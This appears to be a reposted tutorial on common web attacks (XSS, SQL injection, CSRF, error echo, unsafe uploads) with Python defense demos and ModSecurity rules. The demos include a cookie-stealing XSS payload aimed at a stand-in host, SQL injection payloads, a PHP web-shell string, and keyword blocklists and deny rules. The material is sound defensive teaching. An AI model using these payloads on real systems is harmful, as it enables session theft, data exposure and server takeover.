A brief introduction to common security attack methods and defenses

Source: Internet
Author: User

Common security attacks include XSS, CSRF, SQL injection, and so on.

I. XSS: cross-site scripting attacks

Cross-site scripting (Cross Site Scripting) is abbreviated XSS so that it is not confused with the abbreviation for cascading style sheets (Cascading Style Sheets, CSS). A malicious attacker inserts malicious HTML or script code into a Web page; when a user browses that page, the code embedded in the page is executed in the user's browser, with the page's own origin and privileges, to achieve the attacker's purpose: stealing cookies, passwords and other important data, and then forging transactions in the user's name and stealing information and property.

Attack mode
Reflected XSS: the attacker entices the user to click a link whose parameters carry the malicious script; the server echoes the parameter into the response and the script executes in the victim's browser.
Persistent (stored) XSS: the malicious script is saved in the Web site's database (a comment, a profile field, etc.) and is executed through the normal page whenever any user browses it.

Defenses
Escape HTML dangerous characters in every piece of untrusted output, for example "<" to "&lt;", ">" to "&gt;", "&" to "&amp;", and the quote characters to "&quot;" and "&#x27;" when the value lands inside an attribute.
HttpOnly: browsers prohibit page JavaScript from reading cookies that carry the HttpOnly attribute. Add HttpOnly to cookies holding sensitive information (the session identifier in particular) so that an XSS payload cannot read them through document.cookie. HttpOnly limits the damage of a successful XSS; it does not prevent the injection itself, so output escaping is still required.
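The two defenses above, as an added example (this is not code from the original page; the comment payload, the session id and the cookie name SESSIONID are constructed for illustration). It renders the same attacker-supplied comment with and without escaping, shows why the quote characters also matter inside an attribute, and builds a Set-Cookie header with HttpOnly set:

```python
import html
from http.cookies import SimpleCookie

# Constructed sample: a comment an attacker submitted to a stored-XSS target.
ATTACKER_COMMENT = '<script>new Image().src="https://evil.example/?c="+document.cookie</script>'


def render_comment_unsafe(comment: str) -> str:
    """Vulnerable: untrusted text is pasted straight into the page markup."""
    return f'<p class="comment">{comment}</p>'


def render_comment_safe(comment: str) -> str:
    """Hardened: every HTML-significant character is escaped first.
    html.escape(quote=True) turns & < > " ' into entities, so the browser
    treats the result as text and never as markup."""
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


def render_attribute_safe(value: str) -> str:
    """Attribute context: the template must quote the value AND the quote
    characters must be escaped, otherwise an input such as
    x" onmouseover="alert(1) closes the attribute and adds an event handler."""
    return f'<input type="text" name="q" value="{html.escape(value, quote=True)}">'


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie header for the session cookie with HttpOnly (and Secure) set,
    so document.cookie in the page cannot read it even if XSS succeeds."""
    cookie = SimpleCookie()
    cookie["SESSIONID"] = session_id
    cookie["SESSIONID"]["httponly"] = True
    cookie["SESSIONID"]["secure"] = True
    cookie["SESSIONID"]["path"] = "/"
    return cookie.output(header="Set-Cookie:")


def contains_script_tag(markup: str) -> bool:
    """Check used by the demo/tests: does the rendered markup contain a live
    <script> element (as opposed to the escaped text &lt;script&gt;)?"""
    return "<script" in markup.lower()


if __name__ == "__main__":
    print(render_comment_unsafe(ATTACKER_COMMENT))
    print(render_comment_safe(ATTACKER_COMMENT))
    print(render_attribute_safe('x" onmouseover="alert(1)'))
    print(session_cookie_header("d41d8cd98f00b204"))
```

Escaping is context dependent: html.escape is correct for text nodes and quoted attribute values, but a value placed inside a JavaScript block or a URL needs the encoding of that context instead.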


II. Injection attacks

The main forms are SQL injection and OS command injection.

Attack mode
Attackers mostly target sites built on open-source software: the database structure of those products is public, so a query that works against one installation works against every site running the same software.
Error echo: if the site echoes errors, the server's internal 500 error (including the database error text) is displayed in the browser. By constructing illegal parameters, the attacker repeatedly provokes exception messages and uses them to work out the database structure.
Blind injection: when no error is echoed, the attacker guesses table names and column structure from differences in the page's behaviour (a condition that is true versus false, or a delayed response).

Defenses
Sanitization: filtering SQL keywords such as "drop table" with regular expressions. On its own this is a weak defense: keyword filters are routinely bypassed with case changes, comments or alternative syntax, so treat it as a supplement to parameter binding, not a replacement.
Parameter binding: precompile the SQL statement and bind the parameters, so that the incoming content is always treated as a value and never as part of the SQL text. Common database access layer frameworks (IBatis, Hibernate, etc.) implement SQL precompilation and parameter binding.
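The vulnerable query, the keyword filter and the bound-parameter version side by side, as an added example that is not part of the original page. The users table and the blocklist pattern are constructed for illustration; sqlite3 stands in for whatever database the application uses, since the placeholder mechanism is the same idea everywhere:

```python
import re
import sqlite3

# Constructed sample database standing in for the real application's schema.
SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT);
INSERT INTO users VALUES (1, 'alice', 'admin');
INSERT INTO users VALUES (2, 'bob', 'user');
INSERT INTO users VALUES (3, 'carol', 'user');
"""


def open_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def find_user_unsafe(conn, name: str) -> list:
    """Vulnerable: the user-supplied name is spliced into the SQL text, so a
    quote in the input changes the structure of the statement."""
    sql = f"SELECT id, name, role FROM users WHERE name = '{name}'"
    return conn.execute(sql).fetchall()


# "Disinfection" as the text describes it: a regular-expression keyword filter.
BLOCKLIST = re.compile(r"\b(drop\s+table|union\s+select|or\s+1=1)\b")


def filter_rejects(name: str) -> bool:
    return BLOCKLIST.search(name.lower()) is not None


def find_user_filtered(conn, name: str) -> list:
    """Keyword filtering alone. It rejects the obvious payloads but not
    variants such as ' OR '1'='1, so it is not a complete defense."""
    if filter_rejects(name):
        raise ValueError("rejected by keyword filter")
    return find_user_unsafe(conn, name)


def find_user_bound(conn, name: str) -> list:
    """Hardened: the statement is compiled with a placeholder and the value is
    bound separately, so the input can only ever be compared as a string."""
    sql = "SELECT id, name, role FROM users WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


# Classic tautology payload: the WHERE clause becomes name = '' OR '1'='1'.
PAYLOAD = "' OR '1'='1"

if __name__ == "__main__":
    db = open_db()
    print("unsafe  :", find_user_unsafe(db, PAYLOAD))      # every row
    print("filter  :", filter_rejects(PAYLOAD))            # False: slips through
    print("bound   :", find_user_bound(db, PAYLOAD))       # []
    print("bound   :", find_user_bound(db, "bob"))         # only bob
```

The filter catches `' OR 1=1 --` but lets the quoted form through, which is the usual story with blocklists; the bound version returns nothing for either, because the whole payload is compared literally against the name column.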
III. CSRF: cross-site request forgery

CSRF (Cross-site request forgery, usually abbreviated CSRF or XSRF) is a malicious use of a Web site in which the attacker's page makes the victim's browser send a request to a site the victim is logged in to. The browser attaches the victim's cookies to that request automatically, so the trusted site cannot tell the forged request from one the user intended.

Attack mode
A CSRF attack relies on the following assumptions:
The attacker knows the site where the victim is logged in.
The victim holds a persistent authorization cookie for the target site, or currently has a valid session cookie.
The target site does not require a second authorization for the user's action on the site; it accepts the cookie alone as proof of intent.

Defenses
Generally a form token (a secret, per-session value embedded in the form that the attacker's page cannot read), a verification code (CAPTCHA), a Referer/Origin check and similar means are used to avoid CSRF.
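The form-token and Origin/Referer checks, as an added example (not code from the original page). The site origin https://bank.example, the SESSIONID cookie and the in-memory session store are assumptions made for the demo; the server-side handler is framework-independent so it can be read as pseudocode for any Web stack:

```python
import hmac
import secrets
from urllib.parse import urlparse

# Constructed in-memory session store: session id -> CSRF token for that session.
SESSIONS = {}
SITE_ORIGIN = "https://bank.example"  # assumed origin of the protected site


def new_session() -> str:
    """Create a session and a random, unguessable CSRF token bound to it."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = secrets.token_urlsafe(32)
    return sid


def transfer_form(sid: str) -> str:
    """The legitimate form carries the token in a hidden field. A page on
    another origin cannot read this HTML, so it cannot copy the token."""
    return (
        f'<form method="POST" action="{SITE_ORIGIN}/transfer">'
        f'<input type="hidden" name="csrf_token" value="{SESSIONS[sid]}">'
        '<input name="to"><input name="amount"><button>Send</button></form>'
    )


def handle_transfer(cookies: dict, headers: dict, form: dict) -> tuple:
    """Server side. Accept only if (1) the session cookie is valid, (2) the
    Origin (or, failing that, Referer) points back to our own site, and
    (3) the submitted token equals the one stored for this session,
    compared in constant time."""
    sid = cookies.get("SESSIONID")
    if sid not in SESSIONS:
        return 401, "no session"
    source = headers.get("Origin") or headers.get("Referer")
    if source is None:
        return 403, "missing Origin/Referer"
    src = urlparse(source)
    if f"{src.scheme}://{src.netloc}" != SITE_ORIGIN:
        return 403, "cross-site request"
    submitted = form.get("csrf_token", "")
    if not hmac.compare_digest(submitted, SESSIONS[sid]):
        return 403, "bad csrf token"
    return 200, f"transferred {form.get('amount')} to {form.get('to')}"


if __name__ == "__main__":
    sid = new_session()
    cookies = {"SESSIONID": sid}  # the browser sends this on every request
    # Legitimate submission from our own form.
    good = {"csrf_token": SESSIONS[sid], "to": "bob", "amount": "10"}
    print(handle_transfer(cookies, {"Origin": SITE_ORIGIN}, good))
    # Forged submission from the attacker's page: the cookie still arrives,
    # but the page could neither read the token nor spoof the Origin header.
    forged = {"to": "attacker", "amount": "9999"}
    print(handle_transfer(cookies, {"Origin": "https://evil.example"}, forged))
```

The Origin check alone is not enough (older clients and some privacy tools omit the header), and a token alone still leaves the request observable on the wire, so the two are usually combined as here.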
IV. Error echo

Servers generally turn error echo on by default, which hands the attacker detailed exception text (stack traces, database error messages, file paths) to work from.

Defense
Design a dedicated error page for the site: server 500 errors are redirected to that page, which shows only a generic message, while the exception details are written to the server log where the operators can read them.

V. File upload

Limit the type and the permissions of uploaded files to prevent an attacker from uploading an executable program (a web shell, for example) and then running it on the server.
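What the attacker sees with error echo on versus off, as an added example that is not part of the original page. The accounts table and the deliberately naive lookup (it splices the raw parameter into the SQL so that a malformed value raises a database error) are constructed to reproduce the situation the injection section describes; the point demonstrated is the handler, which either echoes the exception to the client or logs it and returns a generic page:

```python
import logging
import sqlite3
import traceback

log = logging.getLogger("app")
logging.basicConfig(level=logging.ERROR)

# Constructed schema standing in for the real application's database.
SCHEMA = "CREATE TABLE accounts (id INTEGER PRIMARY KEY, owner TEXT, balance INTEGER);"

GENERIC_ERROR_PAGE = "<h1>Something went wrong</h1><p>Please try again later.</p>"


def query_account(conn, raw_id: str) -> list:
    """Deliberately naive lookup (this is the bug, kept so the error shows):
    raw_id is spliced into the SQL, so an illegal parameter raises an error."""
    return conn.execute(f"SELECT * FROM accounts WHERE id = {raw_id}").fetchall()


def handle_request(conn, raw_id: str, debug: bool) -> tuple:
    """Return (status, body). With debug=True (error echo on) the full
    traceback goes to the client; with debug=False it goes to the server log
    and the client gets the dedicated error page."""
    try:
        return 200, str(query_account(conn, raw_id))
    except sqlite3.Error as exc:
        if debug:
            return 500, "Internal Server Error\n" + traceback.format_exc()
        log.error("request failed for id=%r: %s", raw_id, exc)
        return 500, GENERIC_ERROR_PAGE


if __name__ == "__main__":
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    # Attacker's probe: an illegal parameter that names a column. With echo on,
    # the response says "no such column: secret_flag", while the same probe
    # with a real column name ("owner") succeeds, so column names can be
    # enumerated one by one. With echo off both cases look the same.
    probe = "1 OR secret_flag = 1"
    print(handle_request(conn, probe, debug=True)[1])
    print(handle_request(conn, probe, debug=False)[1])
```

Turning echo off removes the oracle but not the injection; the fix for the query itself is parameter binding as in the previous section.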
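A concrete upload check for the restriction described above, as an added example (not code from the original page). The allowed types, the size cap and the use of a random server-chosen file name are choices made for the demo, and the "PNG" content is constructed from the format's signature bytes only:

```python
import os
import secrets
import stat
import tempfile

ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}
# File signatures ("magic bytes") for the allowed image types.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
MAX_SIZE = 5 * 1024 * 1024


def validate_upload(filename: str, data: bytes) -> tuple:
    """Return (ok, extension-or-reason). The extension must be on the
    allowlist, the content must start with that type's signature (a .png
    that begins with <?php is not a picture), and the size is capped."""
    base = os.path.basename(filename)
    if "." not in base:
        return False, "no extension"
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension .{ext} not allowed"
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match declared type"
    if len(data) > MAX_SIZE:
        return False, "too large"
    return True, ext


def new_upload_dir() -> str:
    """Upload directory for the demo; in production this is outside the web
    root, or served with script execution disabled."""
    return tempfile.mkdtemp(prefix="uploads-")


def store_upload(upload_dir: str, filename: str, data: bytes) -> str:
    """Store under a random server-chosen name (never the user's name, so
    path components and double extensions in it are irrelevant) with mode
    0644: readable, never executable."""
    ok, ext_or_reason = validate_upload(filename, data)
    if not ok:
        raise ValueError(ext_or_reason)
    path = os.path.join(upload_dir, f"{secrets.token_hex(16)}.{ext_or_reason}")
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o644)
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    os.chmod(path, 0o644)  # independent of the process umask: no exec bit
    return path


def is_executable(path: str) -> bool:
    return bool(os.stat(path).st_mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH))


if __name__ == "__main__":
    d = new_upload_dir()
    png = MAGIC["png"] + b"\x00" * 32  # constructed PNG-looking content
    print(store_upload(d, "avatar.png", png))
    shell = b"<?php system($_GET['c']); ?>"
    print("shell.php", validate_upload("shell.php", shell))
    print("shell.png", validate_upload("shell.png", shell))
    # The client's path is ignored; the file lands in d under a random name.
    print(store_upload(d, "../../etc/cron.d/job.png", png))
```

The web server configuration still matters: even a correctly named image should be served from a location where the server will not interpret it as a script.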

VI. Introduction of the open-source security product ModSecurity

ModSecurity is an intrusion detection and prevention engine for Web applications, also known as a Web application firewall (WAF). It is designed to strengthen the security of Web applications and to protect them from attacks of known and unknown kinds. It runs as a module of the Apache Web server or as a stand-alone application. Main functions:
1. HTTP traffic logging
2. Real-time monitoring and Web attack detection
3. Three defense approaches: the negative model (block requests matching known-bad patterns), the positive model (allow only input that matches what the application expects) and rules for known vulnerabilities of specific products
4. Rule engine
5. Embedded deployment: it does not change the existing network structure, and the system overhead is small.
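What the negative and positive models look like in the rule engine, as an added example (these rules are written for this page, not taken from ModSecurity's own rule sets; the rule ids and the parameter name user_id are assumptions). Rules for known vulnerabilities use the same SecRule mechanism with a pattern specific to one product's bug:

```apache
SecRuleEngine On

# Negative model: deny any request argument that matches a known-bad pattern.
SecRule ARGS "@rx (?i)\bunion\b[\s\S]*?\bselect\b" \
    "id:100001,phase:2,deny,status:403,log,msg:'SQL injection pattern in request argument'"

# Positive model: the user_id parameter may only ever be a short decimal number;
# anything else is denied regardless of whether it matches an attack signature.
SecRule ARGS:user_id "!@rx ^[0-9]{1,10}$" \
    "id:100002,phase:2,deny,status:403,log,msg:'user_id must be numeric'"
```

Phase 2 evaluates the rule after the request body has been read, so it covers both query-string and POST parameters; the positive rule is the stronger of the two because it does not need to anticipate the attacker's syntax.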


